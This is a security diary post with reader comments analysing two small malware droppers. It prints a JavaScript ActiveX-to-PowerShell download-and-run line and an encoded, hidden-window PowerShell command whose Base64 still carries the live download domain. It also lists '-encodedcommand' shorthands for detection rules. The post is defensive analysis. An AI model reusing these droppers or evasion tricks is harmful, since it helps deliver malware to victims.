|
Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small Javascript sample with only 2 lines of code: var d=new ActiveXObject(‘Shell.NormandApplication’.replace(‘Normand’, ‘’)); d.ShellExecute(“PowerShell”,”((New-Object System.Net.WebClient).DownloadFile(‘http://[redacted].exe', ‘xwing.pif’);Start-Process ‘xwing.pif’”,””,””,0); There is no real obfuscation here, just a trick to avoid the detection of the string ‘Shell.Application’ which often searched by automated tools… Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell which has the following cool feature: EncodedCommand[1].
Here is a sample that I also detected yesterday (the lines have been truncated for the readability): poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g The decoded Base64 string is: (nEw-objecT SySTem.Net.WEbCliENt).DowNLoaDFIlE( https://[redacted]/images/Scan_2.exe , $env:TEmP\output.exe ) ; inVokE-ExPResSIoN $ENv:tEMP\output.exe Nothing fancy, easy to decode but this trick will bypass most of the default security controls. A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case). Note that the PE file is downloaded via HTTPS! [1] https://blogs.msdn.microsoft.com/timid/2014/03/26/powershell-encodedcommand-and-round-trips/ Xavier Mertens (@xme) |
Xme 697 Posts ISC Handler Mar 30th 2017 |
| Thread locked Subscribe |
Mar 30th 2017 5 years ago |
|
>A good idea is to fine tune your regular expressions and filters to catch the "-encodedcommand" string (and ignore the case).
Also worth note: https://www.trustedsec.com/blog/circumventing-encodedcommand-detection-powershell/ "There are 15 different iterations to shorthand EncodedCommand which defenders will typically attempt to key off on. One of the most unknown ones is “-ec” which is shorthanded for “-encodedcommand”. Shorthand encodedcommand that should be added to detection rules below: -e -ec -en -enc -enco -encod -encode -encoded -encodedc -encodedco -encodedcom -encodedcomm -encodedcomma -encodedcomman -encodedcommand " |
Anonymous |
| Quote |
Mar 30th 2017 5 years ago |
|
Good point! Thanks for sharing!
|
Xme 697 Posts ISC Handler |
| Quote |
Mar 30th 2017 5 years ago |
|
Hi Xavier,
Did you mean to redact the domain in the base64? I figure I am not the only one that decoded it... |
ridale 1 Posts |
| Quote |
Mar 31st 2017 5 years ago |
|
Nope, the goal was to prevent the domain to be indexed by bots etc.
|
Xme 697 Posts ISC Handler |
| Quote |
Mar 31st 2017 5 years ago |
Sign Up for Free or Log In to start participating in the conversation!
https://www.sans.edu
